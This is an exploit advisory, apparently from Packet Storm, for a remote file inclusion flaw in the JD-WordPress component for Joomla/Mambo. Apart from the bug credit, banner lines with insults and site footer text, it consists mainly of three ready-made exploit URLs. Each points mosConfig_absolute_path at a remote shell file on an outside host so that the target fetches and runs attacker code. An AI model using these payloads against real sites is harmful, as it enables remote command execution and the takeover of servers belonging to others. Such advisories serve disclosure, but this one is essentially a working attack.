JD-WordPress suffers from a remote file inclusion vulnerability.
a29fa9ad87d09b2126c672ee2423cf18ff231120339b690d140ca6e263135baf################### Marhateo il + Lamer di mirc
##########################################
JD-WordPress -Mambo Moodle Remote File Include
------------------------------------------------------------------------------------
Bug Found by: Drago84
greetz: Exclusive Security
source code :
http://www.joomladeveloping.org/content/view/17/36/
This bug allows a remote atacker to execute commands via
rfi
path: ?mosConfig_absolute_path=
page:
wp-comments-post.php
wp-feed.php
wp-trackback.php
xpl:
http://web/components/com_jd-wp/wp-comments-post.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_jd-wp/wp-trackback.php?mosConfig_absolute_path=http://shell.txt
################### Marhateo il coglione di mirc
##########################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed